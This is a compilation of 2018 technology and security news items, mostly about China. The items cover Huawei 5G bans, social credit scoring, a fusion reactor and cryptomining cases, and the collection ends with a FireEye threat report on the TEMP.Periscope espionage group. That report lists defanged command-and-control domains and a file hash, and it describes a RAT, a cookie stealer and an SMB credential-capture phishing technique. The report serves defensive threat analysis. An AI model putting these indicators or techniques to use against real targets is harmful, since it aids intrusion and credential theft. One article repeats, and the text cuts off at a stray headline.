If it feels like new technologies go from flights of fancy to billion-dollar businesses faster than ever, that's because they do. From a column (which may be paywalled): Consider that Uber, founded in 2009, started allowing drivers to sign up with their own cars in 2013. Five short years later, the company operates in more than 70 countries and competes with dozens of copycats. It's considering going public in 2019 at a potential valuation of $120 billion, which would make it the biggest IPO in U.S. history by far. When novel software can go from hackathon to app store overnight, and even complex hardware can hit manufacturing lines in months, the determining factor of success is us -- as consumers, workers, even regulators. If the pitch works and we bite, a technology can quickly transform our social norms. At the WSJ Tech D. Live conference in Laguna Beach, Calif., this week, what became apparent across dozens of talks, classes and informal chats is that, when almost anything we can dream up is possible, the most important factors in the spread of technology are now cultural. Not every new development in technology leads to an Uber-scale industry, of course, but here are five trends that highlight this shift. China's success in addressing tech needs at home has made it a global leader. As Google struggles with walkouts and morale at Facebook craters, many workers at Chinese startups are so committed to their work that they've adopted a grueling schedule called 996 -- 9 a.m. to 9 p.m., six days a week. In 2018, China will eclipse the U.S. in spending on R&D, projects the National Science Board. Patrick Collison, chief executive of Stripe, talked about how much of Asia is leapfrogging the West because there isn't tons of old infrastructure -- like gas-guzzling car fleets -- to update, so the latest technology catches on right away. In China, this is especially true in payments, which are now overwhelmingly made through mobile phones. The world's leading face-recognition and drone companies are in China, and its electric-vehicle, autonomous-driving and AI companies are already on par with their U.S. counterparts, said Kai-Fu Lee, former president of Google China and current head of technology-investment firm Sinovation Ventures. China's mission rests on techies dedicated to building the future for its billion-plus population -- achieving global technological dominance en route.

Read more of this story at Slashdot.

A Chinese Startup May Have Cracked Solid-State Batteries

hackingbear writes: According to Chinese media, Qing Tao Energy Development Co, a startup out of the technical Tsinghua University, has deployed a solid-state battery production line in Kunshan, East China. Reports claim the line has a capacity of 100MWh per year -- which is planned to increase to 700MWh by 2020 -- and that the company has achieved an energy density of more than 400Wh/kg, compared to new generation lithium-ion batteries that boast a capacity of around 250-300Wh/kg. Details beyond this are sparse. The headline news here, if accurate, would be that the company has managed to put solid-state batteries into high volume production, but it's not clear how Qing Tao Energy Development has achieved this, nor what price points are involved. Furthermore, while a capacity of 100MWh is not to be sneezed at, it still only equates to fewer than 2,000 long-range EVs per year. Nonetheless, the news demonstrates that progress is happening in the solid-state battery arena. We might not feasibly yet be at high volume production, but we're on our way.

Read more of this story at Slashdot.

Security Affairs: US Government is asking allies to ban Huawei equipment

US Government is inviting its allies to exclude Huawei equipment from critical infrastructure and 5G architectures, reports the Wall Street Journal

The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy an, Japan.

Many countries are going to build 5G infrastructure, but the approach of their governments is completely different. Italian politicians seem to completely ignore the importance of 5G infrastructure for the growth of the country and the potential effects on national security, while senior German officials are planning to exclude Chinese firms such as Huawei from the tender because worried of potential compromise of national security.


According to the Wall Street Journal, the US government is planning to offer financial aid for telecoms development in countries that don’t using the Chinese-made equipment.

Germany is not the first country to ban Chinese firms from the 5G auction, Australia and the US already announced the same decision.

Huawei always denied links to the Chinese intelligence services.

US officials are concerned for the use of Chinese telecom equipment in countries with US military bases, including Germany, Italy, and Japan.

Pierluigi Paganini

(Security Affairs – intelligence, cyber espionage)

The post US Government is asking allies to ban Huawei equipment appeared first on Security Affairs.

Security Affairs

US Government is asking allies to ban Huawei equipment

US Government is inviting its allies to exclude Huawei equipment from critical infrastructure and 5G architectures, reports the Wall Street Journal

The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy an, Japan.

Many countries are going to build 5G infrastructure, but the approach of their governments is completely different. Italian politicians seem to completely ignore the importance of 5G infrastructure for the growth of the country and the potential effects on national security, while senior German officials are planning to exclude Chinese firms such as Huawei from the tender because worried of potential compromise of national security.


According to the Wall Street Journal, the US government is planning to offer financial aid for telecoms development in countries that don’t using the Chinese-made equipment.

Germany is not the first country to ban Chinese firms from the 5G auction, Australia and the US already announced the same decision.

Huawei always denied links to the Chinese intelligence services.

US officials are concerned for the use of Chinese telecom equipment in countries with US military bases, including Germany, Italy, and Japan.

Pierluigi Paganini

(Security Affairs – intelligence, cyber espionage)

The post US Government is asking allies to ban Huawei equipment appeared first on Security Affairs.

US Asks Foreign Allies To Avoid Huawei

The US government is reportedly trying to persuade its foreign allies' wireless and internet providers to avoid Huawei equipment. From a report: Officials have spoken to their counterparts and telecom bosses in Germany, Italy, Japan and other friendly countries where the Chinese company's equipment is already in use, the Wall Street Journal reported, citing unnamed sources. The US is reportedly particularly worried about the use of Huawei equipment in countries with American military bases, since most nonsensitive communication travels via commercial networks, and it's concerned about Chinese meddling.

Read more of this story at Slashdot.

Beijing To Judge Every Resident Based on Behavior by End of 2020

China's plan to judge each of its 1.3 billion people based on their social behavior is moving a step closer to reality, with Beijing set to adopt a lifelong points program by 2021 that assigns personalized ratings for each resident. From a report: The capital city will pool data from several departments to reward and punish some 22 million citizens based on their actions and reputations by the end of 2020, according to a plan posted on the Beijing municipal government's website this week. Those with better so-called social credit will get "green channel" benefits while those who violate laws will find life more difficult. The Beijing project will improve blacklist systems so that those deemed untrustworthy will be "unable to move even a single step," according to the government's plan. Xinhua reported on the proposal Tuesday, while the report posted on the municipal government's website is dated July 18.

Read more of this story at Slashdot.

Forex Analysis And Chartbook: Tech Selloff Resumes, Dollar Dips Again, as Yields Hit 2-Month Low

Monday Market Snapshot Asset Current Value Daily Change S&P 500 2,697 -1.62% DAX 30 11,244 -0.85% WTI Crude Oil 56.76 -0.12% GOLD 1,224 0.21% Bitcoin 4,989 -10.26% EUR/USD 1.1452 0.32% While all eyes were on the cryptocurrency segment today, as the major coins continue to fall sharply, traditional financial markets have also been very active […]

The post Forex Analysis And Chartbook: Tech Selloff Resumes, Dollar Dips Again, as Yields Hit 2-Month Low appeared first on Hacked: Hacking Finance.

5 Things To Watch Next Week + ChartBook

Brexit Saga Nearing It’s End? GBP/USD, 4-Hour Chart Analysis The Great British Pound had its most volatile week since the Brexit referendum, with still the same issue causing turmoil years after the initial shocking decision. For now, nothing is certain about the outcome of the saga, even with several deadlines quickly approaching. After the exodus […]

The post 5 Things To Watch Next Week + ChartBook appeared first on Hacked: Hacking Finance.

China builds an ‘artificial sun’ that is 6 times hotter than our ‘natural sun’

China builds an ‘artificial sun’ that can hit temperatures of 100 million degrees Celsius

Last month, we had reported that a team of scientists at the Chengdu Aerospace Science and Technology Microelectronics System Research Institute Co (CASC) in China has developed an “artificial moon”, 8 times brighter than the natural moon to replace streetlights in the country by 2020.

Now, a team at the Hefei Institutes of Physical Science of the Chinese Academy of Sciences announced that its Experimental Advanced Superconducting Tokamak (EAST) reactor, has hit a new temperature of reaching 100 million degrees Celsius.

The EAST has been dubbed as “artificial sun” since it replicates the process used by the sun to produce energy. It burns at 100 million degrees Celsius, which is over six times hotter than the core of the sun. The temperature of the real sun’s core is at around 15 million degrees Celsius. The state-of-the-art reactor is designed to turn hydrogen into cost-effective green energy.

“Scientists carried out the experiments on plasma equilibrium and instability, confinement and transport, plasma-wall interaction and energetic particle physics to demonstrate the long time scale steady-state H-mode operation with good control of impurity, core/edge MHD stability, heat exhaust using an ITER-like tungsten divertor,” the institute wrote in its announcement article.

Our sun generates light and heat energy by a process called nuclear fusion when two hydrogen nuclei combine to produce huge amount of energy. Scientists believe that nuclear fusion occurs at 100 million degrees Celsius. However, since these two hydrogen nuclei normally resist each other, it requires vast temperatures to overcome their opposing forces.

Hence, reaching over 100 million degrees Celsius is an important step as this is the minimum temperature required to create conditions that are suitable for nuclear fusion on Earth.

The aim of the EAST is to comprehend nuclear fusion process before building a full reactor and use it as an alternative source of energy on Earth in the future. The process promises more power and is far safer than fission, producing almost no dangerous nuclear waste.

“Nuclear fusion is arguably the best way for human beings to get energy. In terms of raw materials, deuterium and tritium required for nuclear fusion are almost inexhaustible in the ocean. Besides, nuclear fusion does not produce any radioactive waste, so it is extremely environmentally friendly,” said the researchers in a recently issued statement.

Matthew Hole, an Associate professor from the Australian National University told ABC News that the achievement was an important step for nuclear fusion science and could be the solution to global energy problems.

“It’s certainly a significant step for China’s nuclear fusion program and an important development for the whole world,” Dr. Hole said.

“The benefit is simple in that it is very large-scale baseload [continuous] energy production, with zero greenhouse gas emissions and no long-life radioactive waste.

The research group in charge of EAST say it accomplished this milestone through the use of various new methods in heating and controlling the plasma; however, they were able to maintain the record temperature for just around 10 seconds.

Dr. Hole also adds that the nuclear fusion reactors evade the risks related to the current nuclear fission reactors, which can be modified into dangerous weapons and are susceptible to possible meltdowns with catastrophic outcomes.

The artificial sun was designed and built by China back in 2006. EAST is 11 meters tall, has an 8 meters diameter and weighs 400 tons. According to China Daily, China becomes the first country to design and develop such an equipment on its own.

The post China builds an ‘artificial sun’ that is 6 times hotter than our ‘natural sun’ appeared first on TechWorm.

Shoddy security of popular smartwatch lets hackers access your child’s location

By Waqas

Smartwatches are generally considered safe to keep track of your kids when they are outside the home. However, there is a scary new revelation about this seemingly reliable gadget that it is possible to hack GPS-enabled smartwatches. Probably a majority of children wear smartwatches these days, and the fact that one of the most popular […]

This is a post from Read the original post: Shoddy security of popular smartwatch lets hackers access your child’s location

Chinese Telecoms Giant ZTE is Helping Venezuela Build a System That Monitors Citizen Behavior Through a New Identification Card

The "fatherland card," already used by the government to track voting, worries many in Venezuela and beyond. From a report: In April 2008, former Venezuelan President Hugo Chavez dispatched Justice Ministry officials to visit counterparts in the Chinese technology hub of Shenzhen. Their mission, according to a member of the Venezuela delegation, was to learn the workings of China's national identity card program. Chavez, a decade into his self-styled socialist revolution, wanted help to provide ID credentials to the millions of Venezuelans who still lacked basic documentation needed for tasks like voting or opening a bank account. Once in Shenzhen, though, the Venezuelans realized a card could do far more than just identify the recipient. There, at the headquarters of Chinese telecom giant ZTE Corp, they learned how China, using smart cards, was developing a system that would help Beijing track social, political and economic behavior. Using vast databases to store information gathered with the card's use, a government could monitor everything from a citizen's personal finances to medical history and voting activity. "What we saw in China changed everything," said the member of the Venezuelan delegation, technical advisor Anthony Daquin. His initial amazement, he said, gradually turned to fear that such a system could lead to abuses of privacy by Venezuela's government. "They were looking to have citizen control." The following year, when he raised concerns with Venezuelan officials, Daquin told Reuters, he was detained, beaten and extorted by intelligence agents. They knocked several teeth out with a handgun and accused him of treasonous behavior, Daquin said, prompting him to flee the country. Government spokespeople had no comment on Daquin's account. The project languished. But 10 years after the Shenzhen trip, Venezuela is rolling out a new, smart-card ID known as the "carnet de la patria," or "fatherland card." The ID transmits data about cardholders to computer servers. The card is increasingly linked by the government to subsidized food, health and other social programs most Venezuelans rely on to survive.

Read more of this story at Slashdot.

Chinese TEMP.Periscope cyberespionage group was using TTPs associated with Russian APTs

Chinese TEMP.Periscope cyberespionage group targeted a UK-based engineering company using TTPs associated with Russia-linked APT groups.

Attribution of cyber attacks is always a hard task, in many cases attackers use false flags to masquerade their identities.

Chinese hackers have targeted a UK-based engineering company using techniques and artifacts attributed to the Russia-linked APT groups Dragonfly and APT28, according to security researchers.

Threat intelligence experts from Recorded Future discovered that Chinese threat actor TEMP.Periscope was using TTPs associated with Russian APT groups in the attempt to make hard the attribution. The same campaign that targeted the U.K.-based engineering company also hit a freelance journalist based in Cambodia, attackers used a command and control infrastructure that was used in the past by the TEMP.Periscope APT group.

“Employees of a U.K.-based engineering company were among the targeted victims of a spearphishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights, and Chinese development.” reads the analysis published by Recorded Future.

“We believe both attacks used the same infrastructure as a reported campaign by Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections. Crucially, TEMP.Periscope’s interest in the U.K. engineering company they targeted dates back to attempted intrusions in May 2017.”

The attackers used the domain scsnewstoday[.]com as C2, the same that was used in a recent TEMP.Periscope campaign targeting the Cambodian government.

The spear-phishing messages were sent by using the popular Chinese email client, Foxmail.

It is interesting to note that attackers employed a unique technique used in the past by Dragonfly APT group in attacks aimed at critical infrastructure. The attackers used a “file://” path in the in the spearphish calling out to a malicious C2 to steal SMB credentials.

A unique technique documented as a Dragonfly TTP in targeting critical infrastructure was used in the attack. The technique attempts to acquire SMB credentials using a “file://” path in the spearphish calling out to a malicious C2.” continues the analysis.

“The attack probably made use of a version of the open source tool Responder as an NBT-NS poisoner. APT28 used Responder in attacks against travelers staying at hotels in 2017.”

The same UK engineering company was already targeted by TEMP.Periscope in a May 2017, months later the hackers also hit the US engineering and academic entities.

“Recorded Future expects TEMP.Periscope to continue to target organisations in the high-tech defence and engineering sectors,” concludes the report.

“The Chinese strategic requirement to develop advanced technology, particularly in marine engineering, remains an intense focus as China looks to dominate the South China Sea territory.”


“We believe TEMP.Periscope will continue to use commodity malware because it is still broadly successful and relatively low cost for them to use. They will continue to observe ‘trending’ vulnerabilities to exploit and use techniques that have been publicly reported in order to gain access to victim networks.”

“We have to understand and tackle the underlying economic ecosystem that enables, funds and supports criminal activity on a global scale to stem the tide and better protect ourselves. By better understanding the systems that support cyber-crime, the security community can better understand how to disrupt and stop them.”

Pierluigi Paganini

(Security Affairs – TEMP.Periscope, hacking)

The post Chinese TEMP.Periscope cyberespionage group was using TTPs associated with Russian APTs appeared first on Security Affairs.

Senior German officials wants exclude Chinese firms from building 5G infrastructure

Senior German officials are making pressure on the government to exclude Chinese firms from building the country’s 5G infrastructure.

Many countries are going to build 5G infrastructure, but the approach of the government is completely different. Italian politicians seem to completely ignore the importance of 5G infrastructure for the growth of the country and the potential effects on national security, while senior German officials are planning to exclude Chinese firms such as Huawei from the tender because worried of potential compromise of national security.

Germany is not the first country to ban Chinese firms from the 5G auction, Australia and the US already announced the same decision.

“There is serious concern. If it were up to me we would do what the Australians are doing,” one senior German official involved in the internal 5G debate in Berlin told Reuters.

Officials in the German foreign and interior ministries were informed by Australian and American peers of the risks of using Chinese suppliers like Huawei in 5G infrastructure.

A heated debate is growing in the country and experts fear that this could cause a delay in the implementation of the infrastructure that is planned for 2019.

5G infrastructure Germany plans ban China

Officials fear possible interference of the Chinese intelligence that is also allowed under China’s National Intelligence Law, approved in 2017, which states that Chinese “organisations and citizens shall, in accordance with the law, support, cooperate with, and collaborate in national intelligence work”.

Experts believe that companies like Huawei could support the Chinese government in cyber espionage activities or that Chinese intelligence may be able to compromise Huawei’s equipment.

“Cyber security has always been our top priority and we have a proven track record of providing secure products and solutions for our customers in Germany and around the world,” A Huawei spokesman told Reuters.

Huawei believes that the decision to ban it from 5G auctions is “politically motivated” and based on a “mistaken and narrow understanding” of Chinese law.

“Last week, after The Australian newspaper published a story saying Huawei staffers had been used by Chinese intelligence to obtain access codes to infiltrate a foreign network, the company denied that it had ever “provided or been asked to provide customer information for any government or organisation”.” added the Reuters.

“Following Australia’s decision to exclude the Chinese from their 5G network, there is huge angst at Huawei,” said a senior industry official who requested anonymity because of the sensitivity of the issue.

“They fear a domino effect. If it stops with Australia it is not such a big deal. But if it continues it’s serious. A 5G setback in Germany could ripple across Europe.”

Pierluigi Paganini

(Security Affairs – 5G infrastructure, China)

The post Senior German officials wants exclude Chinese firms from building 5G infrastructure appeared first on Security Affairs.

China’s Fusion Reactor Reaches 100 Million Degrees Celsius

hackingbear shares a report from the Australian Broadcasting Corporation: The team of scientists from China's Institute of Plasma Physics announced this week that plasma in their Experimental Advanced Superconducting Tokamak (EAST) -- dubbed the 'artificial sun' -- reached a whopping 100 million degrees Celsius which is six times hotter than the core of the Sun. This temperature is the minimum required to maintain a fusion reaction that produces more power than it takes to run. The Chinese research team said they were able to achieve the record temperature through the use of various new techniques in heating and controlling the plasma, but could only maintain the state for around 10 seconds. The latest breakthrough provided experimental evidence that reaching the 100 million degrees Celsius mark is possible, according to China's Institute of Plasma Physics. "While the U.S. is putting new restrictions on nuclear technology exports to China, inventions and findings of EAST will be important contributions to the development of the International Thermonuclear Experimental Reactor (ITER)," writes Slashdot reader hackingbear. The reactor is currently being built in southern France with collaboration from 35 nations. According to the Australian Broadcasting Corporation, it is expected to be "the first device to consistently produce net energy, producing 500 megawatts of clean and sustainable power."

Read more of this story at Slashdot.

Nigerian ISP Hijacks Google Traffic, Sends It Through Russia and China

A small Nigerian Internet service provider (ISP) hijacked traffic meant for Google data centers on Monday, re-routing local traffic through China and Russia and making some hosted services temporarily unavailable for users.

The post Nigerian ISP Hijacks Google Traffic, Sends It Through Russia and China appeared first on The Security Ledger.

Related Stories

Headmaster caught mining cryptocurrency at school; gets fired

By Uzair Amir

A Chinese school headmaster Lei Hua was caught mining cryptocurrency using the school’s electricity. As a result, he had to lose his job. It happened at Puman Middle School in Hunan province of China. Initially, teachers complained about the loud noise that continued day and night while an increase in the school’s electricity consumption was also reported […]

This is a post from Read the original post: Headmaster caught mining cryptocurrency at school; gets fired

Chinese headmaster fired after setting up his own secret cryptomining rig at school

A Chinese headmaster has lost his job after it was discovered he was stealing the school’s electricity to power a secret cryptocurrency-mining rig.

As the South China Morning Post reports, Lei Hua, the head teacher of a school in the central province of Hunan, built a stack of eight servers that run day and night, mining for the Ethereum cryptocurrency.

According to the report, Lei paid 10,000 yuan (approximately US $1400) in June 2017 to buy his first cryptomining machine, which he set up at his home.

However, the headmaster soon discovered that his activities were consuming a significant amount of electricity – 21 kWH per day – and in an attempt to save himself money, Lei is said to have relocated the machine to his school’s computer room, where it was soon joined by more mining machines.

Astonishingly, the school’s deputy headmaster is also said to have joined the scheme, buying a mining machine with Lei’s help that also gobbled up the school’s power supply.

In all, a total of eight cryptomining machines were installed in the school between mid-2017 and the summer of 2018.

After one year, an electricity bill of 14,700 yuan (US $2120) had been racked up, causing a school employee to raise a concern with the headmaster about why the school might be using so much electricity. Lei, however, dismissed the question and blamed the increased bill on the cost of air conditioning and heaters.

It was only when fellow teachers at the school became suspicious of the continual sound of whirring computers that the rig of eight cryptomining devices was identified.

Both Lei and his deputy headmaster have had their cryptocurrency earnings seized by the authorities, although it is not known how much they might have earnt through their clandestine operation. Lei was dismissed last month, according to reports, and his deputy given an official warning.

It’s an amusing story, but there are genuine concerns for other organisations here.

The cryptocurrency ‘gold rush’ has encouraged many people to break rules and even the law, motivated by the dream of earning themselves a fortune.

We’ve often seen this exhibited through the use of cryptomining malware impacting internet-connected PCs, but it’s equally an issue inside companies and organisations where staff might be tempted to sneak in a few computers to mine away under a desk, or in a seldom-visited server room.

Perhaps the most notorious example of this was the arrest earlier this year of a group of Russian nuclear scientists, who hijacked their own supercomputer at a top-secret nuclear weapon facility to allegedly mine for cryptocurrencies.

With the huge amount of energy and great computational power required to mine cryptocurrencies, having a supercomputer at your disposal gives you something of an advantage. Especially when someone else is paying for the electricity…

Organisations need to keep a close eye on what is happening on their network, and whether someone might have sneaked in additional computing equipment for their own purposes without permission.

After all, if you don’t have tight control over what is running in your organisation, you might have more problems than just a high electricity bill.

US government accuses Chinese hackers of stealing jet engine IP

The Justice Department has charged ten Chinese nationals -- two of which are intelligence officers -- of hacking into and stealing intellectual property from a pair of unnamed US and French companies between January 2015 to at least May of 2015. The hackers were after a type of turbofan (portmanteau of turbine and fan), a large commercial airline engine, to either circumvent its own development costs or avoid having to buy it. According to the complaint by the Department of Justice, a Chinese aerospace manufacturer was simultaneously working on making a comparable engine. The hack afflicted unnamed aerospace companies located in Arizona, Massachusetts and Oregon.

Via: ZD Net

Source: US Department of Justice

US intelligence chief says ‘no evidence’ of Chinese spy chips

Dan Coats, the US director of national intelligence, said there's "no evidence" that Chinese spies tampered with servers bought by up to 30 companies, including the likes of Apple and a telecom provider, as Bloomberg reported earlier this month. However, he told Cyberscoop that "we're not taking anything for granted. We haven't seen anything, but we're always watching."

Via: The Verge

Source: Cyberscoop

Apple CEO calls on Bloomberg to retract China surveillance report

Earlier this month, Bloomberg reported that San Jose-based server company Super Micro installed surveillance micro-chips in the Chinese data center hardware of up to 30 companies, including Amazon and Apple. These chips were supposedly used to steal intellectual property. However, all companies that were named in the initial report have denied Bloomberg's claims. Now, Apple CEO Tim Cook is calling on the well-reputed publication to retract its story altogether, according to BuzzFeed News.

Source: BuzzFeed News

Stolen Apple IDs reportedly used for mobile payment theft in China

Users of two major mobile payment services in China -- Alipay and WeChat Pay -- have reported unauthorized Apple App Store spending in recent days, with some losing nearly $300 through fraudulent transactions. The companies say that stolen Apple IDs are to blame, the Wall Street Journal reports, and Alipay has asked Apple to investigate. In the meantime, Alipay is telling its customers to minimize potential losses by reducing how much money can be used from their accounts without a password.

Via: 9to5Mac

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally


FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."

Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. This TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX) .

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.

Figure 2: Human right protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).

Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academics, aviation, chemical, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB) industry, possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to business worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious)

AIRBREAK Downloader



(3c51c89078139337c2c92e084bb0904c) [Figure 4]










Philippines-draws-three-hard-new-lines-on-china .js







Table 1: AIRBREAK downloaders

Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.

Figure 5: SCANBOX welcome page

Copied Article Topic

Article Source (Not Compromised)

Leaders confident yet nervous

Khmer Times

Mahathir_ 'We want to be friendly with China

PM urges voters to support CPP for peace

CPP determined to maintain Kingdom's peace and development

Bun Chhay's wife dies at 60

Crackdown planned on boycott callers

Further floods coming to Kingdom

Kem Sokha again denied bail

PM vows to stay on as premier to quash traitors

Iran_ Don't trust Trump

Fresh News

Kim-Trump summit_ Singapore's role

Trump's North Korea summit may bring peace declaration - but at a cost


U.S. pushes NATO to ready more forces to deter Russian threat


Interior Minister Sar Kheng warns of dirty tricks

Phnom Penh Post

Another player to enter market for cashless pay

Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America

ABC News

China-funded national road inaugurated in Cambodia

The Cambodia Daily

Kim and Trump in first summit session in Singapore

Asia Times

U.S. to suspend military exercises with South Korea, Trump says

U.S. News

Rainsy defamed the King_ Hun Sen



Associated Press

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).






  • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
  • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.


Credential Theft

  • DADBOD is a tool used to steal user cookies.
  • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses,, is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that the computers used to log in all cases are configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised – simply gathering intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

Chinese arrest 20 in major Crypto Currency Mining scam

According to Chinese-language publication Legal Daily police in two districts of China have arrested 20 people for their roles in a major crypto currency mining operation that earned the criminals more than 15 million yuan (currently about $2M USD).

The hackers installed mining software developed by Dalian Yuping Network Technology Company ( 大连昇平网络科技有限 ) that was designed to steal three types of coins.  Digibyte Coins (DGB, currently valued at USD$0.03 each),  Siacoin (SC, currently valued at $0.01 each) and DeCred coins (DCR coins, currently valued at $59.59 each).

It is believed that these currencies were chosen for the dual reason that they are easier to mine, due to less competition, and that they are less likely to be the target of sophisticated blockchain analysis tools.

The Game Cheat Hacker

